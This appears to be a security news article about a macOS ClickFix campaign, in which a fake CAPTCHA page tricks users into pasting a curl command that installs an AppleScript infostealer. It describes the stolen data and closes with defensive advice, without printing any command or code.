AppleScript Infostealer Deployed in New macOS ClickFix Campaign

The emergence of an AppleScript‑based infostealer in the latest ClickFix campaign underscores a shifting threat landscape for macOS users. Historically, Apple’s scripting environment has been leveraged for legitimate automation, but attackers are now exploiting its low‑level access to bypass traditional defenses. By embedding malicious code in a seemingly innocuous CAPTCHA verification flow, the campaign sidesteps gate‑keeping mechanisms that typically protect the desktop. This approach reflects a broader trend where threat actors repurpose native macOS tools to achieve persistence and evade detection, raising concerns for both individual users and corporate IT teams.

The payload’s delivery chain is particularly insidious. Victims are directed to a counterfeit CAPTCHA page that validates the operating system and then prompts them to paste a curl command into Spotlight, masquerading as a verification code. Once executed, the command downloads a hidden AppleScript that harvests usernames, session cookies, and a wealth of data from more than a dozen Chromium‑based browsers, Firefox, Waterfox, and sixteen standalone cryptocurrency wallet applications. By also targeting over two hundred browser extensions, the malware maximizes its data‑exfiltration surface, differentiating itself from typical macOS adware and aligning more closely with sophisticated credential‑stealing operations.

The campaign’s focus on older macOS releases such as versions preceding Tahoe 26.4 highlights the security premium of staying current. Enterprises should enforce rapid patch cycles, deploy endpoint detection that monitors anomalous Spotlight commands, and educate users about unsolicited verification prompts. Additionally, limiting the installation of unnecessary browser extensions and employing password managers that isolate credentials can reduce the attack’s payoff. As AppleScript continues to be a double‑edged sword, the industry must balance automation benefits with robust sandboxing to curb future macOS‑focused infostealers.